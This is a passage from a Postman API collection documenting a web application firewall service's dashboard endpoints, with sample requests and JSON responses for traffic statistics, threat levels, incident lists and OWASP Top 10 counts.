last_14_days\"\n}"},{"id":"9c7e935f-fce7-4eeb-a2e9-e96401af284b","name":"success-last-24-hours-requests","originalRequest":{"method":"GET","header":[{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"}],"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/dashboard?category=req&timespan=last_24_hours","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","dashboard"],"query":[{"key":"category","value":"req"},{"key":"timespan","value":"last_24_hours"}],"variable":[{"key":"ep_id","value":"{{ep_id}}"}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 11 Jun 2019 02:35:09 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"2246"},{"key":"Connection","value":"close"},{"key":"x-amzn-RequestId","value":"87d4cc7e-8bf1-11e9-8041-191615239315"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"bF_2lHtVSQ0Fh5w="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5cff135d-79a9fa3d2306f63d1a298033;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"20190610T023000\": {\n        \"allowed_req\": 0,\n        \"blocked_req\": 0\n    },\n    \"20190610T024500\": {\n        \"allowed_req\": 0,\n        \"blocked_req\": 0\n    },\n    \"20190610T030000\": {\n        \"allowed_req\": 0,\n        \"blocked_req\": 0\n    },\n    \"20190610T031500\": {\n        \"allowed_req\": 0,\n        \"blocked_req\": 0\n    },\n    \"20190610T033000\": {\n        \"allowed_req\": 0,\n        \"blocked_req\": 0\n    }\n}"},{"id":"ba0c85c1-843d-4e29-9737-2570b4b91370","name":"DashboardLogs-month-sum","originalRequest":{"method":"GET","header":[{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"}],"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/dashboard?category=month_sum","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","dashboard"],"query":[{"key":"category","value":"month_sum"}],"variable":[{"key":"ep_id","value":"{{ep_id}}"}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 11 Jun 2019 02:58:39 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"128"},{"key":"Connection","value":"close"},{"key":"x-amzn-RequestId","value":"cfbc846e-8bf4-11e9-96f1-e99a98d7a2a5"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"bGDSxHGTyQ0FWfw="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5cff18de-5956a5fc5849f3ac431c2916;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"data\": 0,\n    \"cost\": 7.29,\n    \"blocked_req\": 0,\n    \"req\": 0,\n    \"current_license_type\": \"aws\",\n    \"bandwidth\": 13,\n    \"ep_bandwidth\": 0\n}"},{"id":"72db66da-c266-4cf9-908a-d178e5793144","name":"Get Top Incident of Current App","originalRequest":{"method":"GET","header":[{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"}],"url":{"raw":"https://api.waasonline.com/v1/application/:ep_id/dashboard?category=high_risk&timespan=last_24_hours","protocol":"https","host":["api","waasonline","com"],"path":["v1","application",":ep_id","dashboard"],"query":[{"key":"category","value":"high_risk"},{"key":"timespan","value":"last_24_hours"}],"variable":[{"key":"ep_id","value":"{{ep_id}}"}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 11 Jun 2019 02:35:09 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"2246"},{"key":"Connection","value":"close"},{"key":"x-amzn-RequestId","value":"87d4cc7e-8bf1-11e9-8041-191615239315"},{"key":"Access-Control-Allow-Origin","value":"https://c8.waasonline.com"},{"key":"x-amz-apigw-id","value":"bF_2lHtVSQ0Fh5w="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5cff135d-79a9fa3d2306f63d1a298033;Sampled=0"}],"cookie":[],"responseTime":null,"body":"[\n    {\n        \"incident_id\": \"us-east-1_6_42\",\n        \"risk\": \"High\",\n        \"name\": \"Anomaly Detection, Illegal OpenAPI Requests(Machine Learning) by 209.121.4.2  from United States\"\n    },\n    {\n        \"incident_id\": \"us-east-1_6_36\",\n        \"risk\": \"High\",\n        \"name\": \"Anomaly Detection, Illegal OpenAPI Requests(Machine Learning) by 209.121.4.2  from United States\"\n    },\n    {\n        \"incident_id\": \"us-east-1_6_41\",\n        \"risk\": \"High\",\n        \"name\": \"Anomaly Detection, Illegal OpenAPI Requests(Machine Learning) by 209.121.4.2  from United States\"\n    },\n    {\n        \"incident_id\": \"us-east-1_6_35\",\n        \"risk\": \"High\",\n        \"name\": \"Anomaly Detection, Illegal OpenAPI Requests(Machine Learning) by 209.121.4.2  from United States\"\n    },\n    {\n        \"incident_id\": \"us-east-1_6_21\",\n        \"risk\": \"High\",\n        \"name\": \"Anomaly Detection, Illegal OpenAPI Requests(Machine Learning) by 209.121.4.2  from United States\"\n    },\n    {\n        \"incident_id\": \"eu-central-1_6_26\",\n        \"risk\": \"High\",\n        \"name\": \"Cross Site Scripting, Anomaly Detection by 209.121.4.2  from United States\"\n    },\n    {\n        \"incident_id\": \"us-east-1_6_28\",\n        \"risk\": \"High\",\n        \"name\": \"Anomaly Detection, Illegal OpenAPI Requests(Machine Learning) by 209.121.4.2  from United States\"\n    },\n    {\n        \"incident_id\": \"eu-central-1_6_20\",\n        \"risk\": \"High\",\n        \"name\": \"Anomaly Detection, Illegal OpenAPI Requests(Machine Learning) by 209.121.4.2  from United States\"\n    },\n    {\n        \"incident_id\": \"us-east-1_6_24\",\n        \"risk\": \"High\",\n        \"name\": \"Anomaly Detection, Illegal OpenAPI Requests(Machine Learning) by 209.121.4.2  from United States\"\n    },\n    {\n        \"incident_id\": \"eu-central-1_6_95\",\n        \"risk\": \"High\",\n        \"name\": \"Anomaly Detection, Illegal OpenAPI Requests(Machine Learning) by 209.121.4.2  from United States\"\n    }\n]"},{"id":"e49175da-0eb4-48ae-aab4-b7d3ec6c4142","name":"Get Incident Timeline of Current App","originalRequest":{"method":"GET","header":[{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"}],"url":{"raw":"https://api.waasonline.com/v1/application/:ep_id/dashboard?category=incidents_timeline&timespan=last_24_hours","protocol":"https","host":["api","waasonline","com"],"path":["v1","application",":ep_id","dashboard"],"query":[{"key":"category","value":"incidents_timeline"},{"key":"timespan","value":"last_24_hours"}],"variable":[{"key":"ep_id","value":"{{ep_id}}"}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 11 Jun 2019 02:35:09 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"2246"},{"key":"Connection","value":"close"},{"key":"x-amzn-RequestId","value":"87d4cc7e-8bf1-11e9-8041-191615239315"},{"key":"Access-Control-Allow-Origin","value":"https://c8.waasonline.com"},{"key":"x-amz-apigw-id","value":"bF_2lHtVSQ0Fh5w="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5cff135d-79a9fa3d2306f63d1a298033;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"start\": 1649888460000,\n    \"end\": 1652480460000,\n    \"line_data\": [\n        {\n            \"line_name\": \"High\",\n            \"number\": [\n                {\n                    \"id\": 1,\n                    \"value\": 0,\n                    \"time\": 1649888460000\n                },\n                {\n                    \"id\": 2,\n                    \"value\": 2,\n                    \"time\": 1650018060000\n                },\n                {\n                    \"id\": 3,\n                    \"value\": 2,\n                    \"time\": 1650147660000\n                },\n                {\n                    \"id\": 4,\n                    \"value\": 2,\n                    \"time\": 1650277260000\n                },\n                {\n                    \"id\": 5,\n                    \"value\": 3,\n                    \"time\": 1650406860000\n                },\n                {\n                    \"id\": 6,\n                    \"value\": 3,\n                    \"time\": 1650536460000\n                },\n                {\n                    \"id\": 7,\n                    \"value\": 1,\n                    \"time\": 1650666060000\n                },\n                {\n                    \"id\": 8,\n                    \"value\": 2,\n                    \"time\": 1650795660000\n                },\n                {\n                    \"id\": 9,\n                    \"value\": 0,\n                    \"time\": 1650925260000\n                },\n                {\n                    \"id\": 10,\n                    \"value\": 3,\n                    \"time\": 1651054860000\n                },\n                {\n                    \"id\": 11,\n                    \"value\": 0,\n                    \"time\": 1651184460000\n                },\n                {\n                    \"id\": 12,\n                    \"value\": 0,\n                    \"time\": 1651314060000\n                },\n                {\n                    \"id\": 13,\n                    \"value\": 0,\n                    \"time\": 1651443660000\n                },\n                {\n                    \"id\": 14,\n                    \"value\": 0,\n                    \"time\": 1651573260000\n                },\n                {\n                    \"id\": 15,\n                    \"value\": 0,\n                    \"time\": 1651702860000\n                },\n                {\n                    \"id\": 16,\n                    \"value\": 0,\n                    \"time\": 1651832460000\n                },\n                {\n                    \"id\": 17,\n                    \"value\": 0,\n                    \"time\": 1651962060000\n                },\n                {\n                    \"id\": 18,\n                    \"value\": 0,\n                    \"time\": 1652091660000\n                },\n                {\n                    \"id\": 19,\n                    \"value\": 0,\n                    \"time\": 1652221260000\n                },\n                {\n                    \"id\": 20,\n                    \"value\": 0,\n                    \"time\": 1652350860000\n                },\n                {\n                    \"id\": 21,\n                    \"value\": 0,\n                    \"time\": 1652480460000\n                }\n            ]\n        },\n        {\n            \"line_name\": \"Moderate\",\n            \"number\": [\n                {\n                    \"id\": 1,\n                    \"value\": 0,\n                    \"time\": 1649888460000\n                },\n                {\n                    \"id\": 2,\n                    \"value\": 0,\n                    \"time\": 1650018060000\n                },\n                {\n                    \"id\": 3,\n                    \"value\": 1,\n                    \"time\": 1650147660000\n                },\n                {\n                    \"id\": 4,\n                    \"value\": 0,\n                    \"time\": 1650277260000\n                },\n                {\n                    \"id\": 5,\n                    \"value\": 0,\n                    \"time\": 1650406860000\n                },\n                {\n                    \"id\": 6,\n                    \"value\": 0,\n                    \"time\": 1650536460000\n                },\n                {\n                    \"id\": 7,\n                    \"value\": 0,\n                    \"time\": 1650666060000\n                },\n                {\n                    \"id\": 8,\n                    \"value\": 0,\n                    \"time\": 1650795660000\n                },\n                {\n                    \"id\": 9,\n                    \"value\": 0,\n                    \"time\": 1650925260000\n                },\n                {\n                    \"id\": 10,\n                    \"value\": 0,\n                    \"time\": 1651054860000\n                },\n                {\n                    \"id\": 11,\n                    \"value\": 0,\n                    \"time\": 1651184460000\n                },\n                {\n                    \"id\": 12,\n                    \"value\": 0,\n                    \"time\": 1651314060000\n                },\n                {\n                    \"id\": 13,\n                    \"value\": 0,\n                    \"time\": 1651443660000\n                },\n                {\n                    \"id\": 14,\n                    \"value\": 0,\n                    \"time\": 1651573260000\n                },\n                {\n                    \"id\": 15,\n                    \"value\": 1,\n                    \"time\": 1651702860000\n                },\n                {\n                    \"id\": 16,\n                    \"value\": 1,\n                    \"time\": 1651832460000\n                },\n                {\n                    \"id\": 17,\n                    \"value\": 0,\n                    \"time\": 1651962060000\n                },\n                {\n                    \"id\": 18,\n                    \"value\": 1,\n                    \"time\": 1652091660000\n                },\n                {\n                    \"id\": 19,\n                    \"value\": 0,\n                    \"time\": 1652221260000\n                },\n                {\n                    \"id\": 20,\n                    \"value\": 0,\n                    \"time\": 1652350860000\n                },\n                {\n                    \"id\": 21,\n                    \"value\": 0,\n                    \"time\": 1652480460000\n                }\n            ]\n        },\n        {\n            \"line_name\": \"Low\",\n            \"number\": [\n                {\n                    \"id\": 1,\n                    \"value\": 0,\n                    \"time\": 1649888460000\n                },\n                {\n                    \"id\": 2,\n                    \"value\": 0,\n                    \"time\": 1650018060000\n                },\n                {\n                    \"id\": 3,\n                    \"value\": 0,\n                    \"time\": 1650147660000\n                },\n                {\n                    \"id\": 4,\n                    \"value\": 0,\n                    \"time\": 1650277260000\n                },\n                {\n                    \"id\": 5,\n                    \"value\": 0,\n                    \"time\": 1650406860000\n                },\n                {\n                    \"id\": 6,\n                    \"value\": 0,\n                    \"time\": 1650536460000\n                },\n                {\n                    \"id\": 7,\n                    \"value\": 0,\n                    \"time\": 1650666060000\n                },\n                {\n                    \"id\": 8,\n                    \"value\": 0,\n                    \"time\": 1650795660000\n                },\n                {\n                    \"id\": 9,\n                    \"value\": 0,\n                    \"time\": 1650925260000\n                },\n                {\n                    \"id\": 10,\n                    \"value\": 0,\n                    \"time\": 1651054860000\n                },\n                {\n                    \"id\": 11,\n                    \"value\": 0,\n                    \"time\": 1651184460000\n                },\n                {\n                    \"id\": 12,\n                    \"value\": 0,\n                    \"time\": 1651314060000\n                },\n                {\n                    \"id\": 13,\n                    \"value\": 0,\n                    \"time\": 1651443660000\n                },\n                {\n                    \"id\": 14,\n                    \"value\": 0,\n                    \"time\": 1651573260000\n                },\n                {\n                    \"id\": 15,\n                    \"value\": 0,\n                    \"time\": 1651702860000\n                },\n                {\n                    \"id\": 16,\n                    \"value\": 0,\n                    \"time\": 1651832460000\n                },\n                {\n                    \"id\": 17,\n                    \"value\": 0,\n                    \"time\": 1651962060000\n                },\n                {\n                    \"id\": 18,\n                    \"value\": 0,\n                    \"time\": 1652091660000\n                },\n                {\n                    \"id\": 19,\n                    \"value\": 0,\n                    \"time\": 1652221260000\n                },\n                {\n                    \"id\": 20,\n                    \"value\": 0,\n                    \"time\": 1652350860000\n                },\n                {\n                    \"id\": 21,\n                    \"value\": 0,\n                    \"time\": 1652480460000\n                }\n            ]\n        }\n    ]\n}"}],"_postman_id":"25b7e91f-e9c7-4221-8654-093470eb9821"},{"name":"Get Threat Level History","id":"5ce22300-c002-4e95-a161-48901800bc8b","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"}],"url":"https://api.tim.waasonline.com/v1/application/:ep_id/threat_level_history?offset_hours={{offset_hours}}&timespan={{timespan}}","description":"<p>Get the information of threat level history on DASHBOARD tab.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","application",":ep_id","threat_level_history"],"host":["api","tim","waasonline","com"],"query":[{"description":{"content":"<p>The value should be integer of -11~12, and the default value is 0. This value is required only when {{timespan}} equals to \"last_7_days\", \"last_14_days\", \"last_30_days\".</p>\n","type":"text/plain"},"key":"offset_hours","value":"{{offset_hours}}"},{"description":{"content":"<p>The values for this variable are [\"last_24_hours\", \"last_7_days\", \"last_14_days\", \"last_30_days\"], no default value.</p>\n","type":"text/plain"},"key":"timespan","value":"{{timespan}}"}],"variable":[{"description":{"content":"<p>The application ID, it can be obtained from List Applications API.</p>\n","type":"text/plain"},"type":"string","value":"{{ep_id}}","key":"ep_id"}]}},"response":[{"id":"4ab8453a-4e56-403d-bb77-6b67fefe6e53","name":"Success","originalRequest":{"method":"GET","header":[{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"}],"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/threat_level_history?offset_hours=+8&category=threat&timespan=last_24_hours","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","threat_level_history"],"query":[{"key":"offset_hours","value":"+8"},{"key":"category","value":"threat"},{"key":"timespan","value":"last_24_hours"}],"variable":[{"key":"ep_id","value":"{{ep_id}}","description":"The application ID"}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 11 Jun 2019 04:37:33 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"1757"},{"key":"Connection","value":"close"},{"key":"x-amzn-RequestId","value":"a09010fc-8c02-11e9-9183-4fc0e7e2f99c"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"bGRx7G7kyQ0FtEg="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5cff300c-65d57a20c40c2e902b140c18;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"20190610T040000\": {\n        \"curr_rank\": 0,\n        \"avg_score\": 0,\n        \"curr_score\": 0\n    },\n    \"20190610T050000\": {\n        \"curr_rank\": 0,\n        \"avg_score\": 0,\n        \"curr_score\": 0\n    },\n    \"20190610T060000\": {\n        \"curr_rank\": 0,\n        \"avg_score\": 0,\n        \"curr_score\": 0\n    },\n    \"20190610T070000\": {\n        \"curr_rank\": 0,\n        \"avg_score\": 0,\n        \"curr_score\": 0\n    },\n    \"20190610T080000\": {\n        \"curr_rank\": 0,\n        \"avg_score\": 0,\n        \"curr_score\": 0\n    },\n    \"20190610T090000\": {\n        \"curr_rank\": 0,\n        \"avg_score\": 185,\n        \"curr_score\": 0\n    },\n    \"20190610T100000\": {\n        \"curr_rank\": 0,\n        \"avg_score\": 0,\n        \"curr_score\": 0\n    },\n    \"20190610T110000\": {\n        \"curr_rank\": 0,\n        \"avg_score\": 0,\n        \"curr_score\": 0\n    },\n    \"20190610T120000\": {\n        \"curr_rank\": 0,\n        \"avg_score\": 0,\n        \"curr_score\": 0\n    },\n    \"20190610T130000\": {\n        \"curr_rank\": 0,\n        \"avg_score\": 0,\n        \"curr_score\": 0\n    },\n    \"20190610T140000\": {\n        \"curr_rank\": 0,\n        \"avg_score\": 0,\n        \"curr_score\": 0\n    },\n    \"20190610T150000\": {\n        \"curr_rank\": 0,\n        \"avg_score\": 0,\n        \"curr_score\": 0\n    },\n    \"20190610T160000\": {\n        \"curr_rank\": 0,\n        \"avg_score\": 0,\n        \"curr_score\": 0\n    },\n    \"20190610T170000\": {\n        \"curr_rank\": 0,\n        \"avg_score\": 0,\n        \"curr_score\": 0\n    },\n    \"20190610T180000\": {\n        \"curr_rank\": 0,\n        \"avg_score\": 0,\n        \"curr_score\": 0\n    },\n    \"20190610T190000\": {\n        \"curr_rank\": 0,\n        \"avg_score\": 0,\n        \"curr_score\": 0\n    },\n    \"20190610T200000\": {\n        \"curr_rank\": 0,\n        \"avg_score\": 0,\n        \"curr_score\": 0\n    },\n    \"20190610T210000\": {\n        \"curr_rank\": 0,\n        \"avg_score\": 0,\n        \"curr_score\": 0\n    },\n    \"20190610T220000\": {\n        \"curr_rank\": 0,\n        \"avg_score\": 0,\n        \"curr_score\": 0\n    },\n    \"20190610T230000\": {\n        \"curr_rank\": 0,\n        \"avg_score\": 0,\n        \"curr_score\": 0\n    },\n    \"20190611T000000\": {\n        \"curr_rank\": 0,\n        \"avg_score\": 0,\n        \"curr_score\": 0\n    },\n    \"20190611T010000\": {\n        \"curr_rank\": 0,\n        \"avg_score\": 0,\n        \"curr_score\": 0\n    },\n    \"20190611T020000\": {\n        \"curr_rank\": 0,\n        \"avg_score\": 1000,\n        \"curr_score\": 0\n    },\n    \"20190611T030000\": {\n        \"curr_rank\": 0,\n        \"avg_score\": 270,\n        \"curr_score\": 0\n    },\n    \"20190611T040000\": {\n        \"curr_rank\": 0,\n        \"avg_score\": 0,\n        \"curr_score\": 0\n    }\n}"},{"id":"9a449463-1a88-488a-801d-f0d574d7b0e8","name":"Fail","originalRequest":{"method":"GET","header":[{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"}],"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/threat_level_history?offset_hours=+8&category=threat&timespan=last_year","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","threat_level_history"],"query":[{"key":"offset_hours","value":"+8"},{"key":"category","value":"threat"},{"key":"timespan","value":"last_year"}],"variable":[{"key":"ep_id","value":"{{ep_id}}"}]}},"status":"Bad Request","code":400,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 11 Jun 2019 04:40:08 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"101"},{"key":"Connection","value":"close"},{"key":"x-amzn-RequestId","value":"fd439aa1-8c02-11e9-bf84-fb2d30601cf4"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"bGSKOFXEyQ0Fc3g="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5cff30a7-bb1a08c6531950178e506afc;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"illegal timespan, valid timespan: 'last_24_hours,last_7_days,last_14_days,last_30_days'\"\n}"}],"_postman_id":"5ce22300-c002-4e95-a161-48901800bc8b"},{"name":"Get Threat Level Values","id":"e6841bab-110c-4faf-a965-6e283a333c78","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"}],"url":"https://api.tim.waasonline.com/v1/application/:ep_id/threat_level_values","description":"<p>Get the information of threat level values on DASHBOARD tab.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","application",":ep_id","threat_level_values"],"host":["api","tim","waasonline","com"],"query":[],"variable":[{"description":{"content":"<p>The application ID, it can be obtained from List Applications API.</p>\n","type":"text/plain"},"type":"string","value":"{{ep_id}}","key":"ep_id"}]}},"response":[{"id":"54aba02a-f644-40c2-a2f5-68eeadf042bd","name":"ThreatLevelValues-success","originalRequest":{"method":"GET","header":[{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"}],"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/threat_level_values?offset_hours={{offset_hours}}","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","threat_level_values"],"query":[{"key":"offset_hours","value":"{{offset_hours}}"}],"variable":[{"key":"ep_id","value":"{{ep_id}}"}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 11 Jun 2019 04:42:23 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"30"},{"key":"Connection","value":"close"},{"key":"x-amzn-RequestId","value":"4dac042d-8c03-11e9-aa0d-4d7df746bf5a"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"bGSfTEITyQ0FW3Q="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5cff312e-fe32bcb0c355bc20fceafb00;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"level\": 0,\n    \"categories\": {}\n}"},{"id":"d14ae0de-f109-468f-9d50-b26c4168ddc6","name":"ThreatLevelValues-fail","originalRequest":{"method":"GET","header":[{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"}],"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/threat_level_values?offset_hours=abc","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","threat_level_values"],"query":[{"key":"offset_hours","value":"abc"}],"variable":[{"key":"ep_id","value":"{{ep_id}}"}]}},"status":"Bad Request","code":400,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 11 Jun 2019 04:43:16 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"77"},{"key":"Connection","value":"close"},{"key":"x-amzn-RequestId","value":"6d81e38b-8c03-11e9-b86c-ef03e64b06dd"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"bGSnpG_-yQ0Fq5A="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5cff3164-0228db6451e5fa08646a8064;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"illegal request parameter: offset_hours shoud be integer number\"\n}"}],"_postman_id":"e6841bab-110c-4faf-a965-6e283a333c78"},{"name":"Get OWASP Top 10 Threats","id":"aa2607fa-10b3-433f-bde4-c6685195fd67","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Accept","value":"application/json"},{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"}],"url":"https://api.tim.waasonline.com/v1/application/:ep_id/dashboard/owasp_top10?timespan={{time_span}}","description":"<p>Get statistics data of OWASP TOP 10 categories.</p>\n","urlObject":{"protocol":"https","path":["v1","application",":ep_id","dashboard","owasp_top10"],"host":["api","tim","waasonline","com"],"query":[{"description":{"content":"<p>Available values include: last_hour, last_24_hours and last_7_days</p>\n","type":"text/plain"},"key":"timespan","value":"{{time_span}}"}],"variable":[{"description":{"content":"<p>The application ID, it can be obtained from List Applications API.</p>\n","type":"text/plain"},"type":"string","value":"{{ep_id}}","key":"ep_id"}]}},"response":[{"id":"f1768ee1-ffba-4c33-a1a2-cde192005e35","name":"OWASP_TOP_10_Threats_SUCCESS","originalRequest":{"method":"GET","header":[{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"}],"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/dashboard/owasp_top10?offset_hours=last_hour","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","dashboard","owasp_top10"],"query":[{"key":"offset_hours","value":"last_hour"}],"variable":[{"key":"ep_id","value":"{{ep_id}}"}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 11 Jun 2019 04:42:23 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"30"},{"key":"Connection","value":"close"},{"key":"x-amzn-RequestId","value":"4dac042d-8c03-11e9-aa0d-4d7df746bf5a"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"bGSfTEITyQ0FW3Q="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5cff312e-fe32bcb0c355bc20fceafb00;Sampled=0"}],"cookie":[],"responseTime":null,"body":"[\n    {\n        \"key\": \"A9:2017-Using Components with Known Vulnerabilities\",\n        \"doc_count\": 7513,\n        \"percentage\": \"42.0\"\n    },\n    {\n        \"key\": \"A1:2017-Injection\",\n        \"doc_count\": 7092,\n        \"percentage\": \"39.7\"\n    },\n    {\n        \"key\": \"A7:2017-Cross-Site Scripting (XSS)\",\n        \"doc_count\": 2095,\n        \"percentage\": \"11.7\"\n    },\n    {\n        \"key\": \"A6:2017-Security Misconfiguration\",\n        \"doc_count\": 478,\n        \"percentage\": \"2.7\"\n    },\n    {\n        \"key\": \"A3:2017-Sensitive Data Exposure\",\n        \"doc_count\": 397,\n        \"percentage\": \"2.2\"\n    }, {\n    \t\"key\": \"A5:2017-Broken Access Control\",\n    \t\"doc_count\": 200,\n        \"percentage\": \"1.1\"\n    }, {\n    \t\"key\": \"A2:2017-SQL Injection\",\n    \t\"doc_count\": 100,\n        \"percentage\": \"0.6\"\n    }\n]"}],"_postman_id":"aa2607fa-10b3-433f-bde4-c6685195fd67"},{"name":"Get ThreatView Threats Statistics","id":"e5dfe677-0a1c-41c3-b189-65da4cf5183d","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Accept","value":"application/json"},{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"}],"url":"https://api.tim.waasonline.com/v1/application/:ep_id/threatview/security/statistics?report_by={{report_by}}&filter={{filter}}&end={{end_time}}&start={{start_time}}&count={{count}}&tend_by={{tend_by}}&sort_by={{sort_by}}","description":"<p>Get the statistics information of threats. The result could be aggregated by srccountry or threat type.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","application",":ep_id","threatview","security","statistics"],"host":["api","tim","waasonline","com"],"query":[{"description":{"content":"<p>Log field name that is used to group the result in grid. Supported values include owasp_top10, main_type, src_ip and srccountry.</p>\n","type":"text/plain"},"key":"report_by","value":"{{report_by}}"},{"description":{"content":"<p>A string, it can be deserialized as Json object. \nThe value shall be URL safe. For example, filter object is like  {\"http_url\":\"test\",\"main_type\":\"Known Attacks\"}, and the value for this param here shall be like \"%7B%22http_url%22%3A%22test%22%2C%22main_type%22%3A%22Known%20Attacks%22%7D\".</p>\n","type":"text/plain"},"key":"filter","value":"{{filter}}"},{"description":{"content":"<p>The endtime of time range in millisecond format.</p>\n","type":"text/plain"},"key":"end","value":"{{end_time}}"},{"description":{"content":"<p>The beginning time of time range in millisecond format.</p>\n","type":"text/plain"},"key":"start","value":"{{start_time}}"},{"description":{"content":"<p>An integer, the number of logs in one page and the maximum value is 100.</p>\n","type":"text/plain"},"key":"count","value":"{{count}}"},{"description":{"content":"<p>Log field name which is used to group data in chart view. The values can be http_method, action, etc.</p>\n","type":"text/plain"},"key":"tend_by","value":"{{tend_by}}"},{"description":{"content":"<p>The field name which is used to sort the result. It must be  present in response, like total_number, score, etc</p>\n","type":"text/plain"},"key":"sort_by","value":"{{sort_by}}"}],"variable":[{"description":{"content":"<p>The application ID, it can be obtained from List Applications API.</p>\n","type":"text/plain"},"type":"string","value":"{{ep_id}}","key":"ep_id"}]}},"response":[{"id":"4adc89f4-27ac-4d8c-bf3b-14c4a89effef","name":"timviewOfThreatsBySourceIP","originalRequest":{"method":"GET","header":[{"key":"Accept","value":"application/json"},{"key":"Authorization","type":"text","value":"Basic 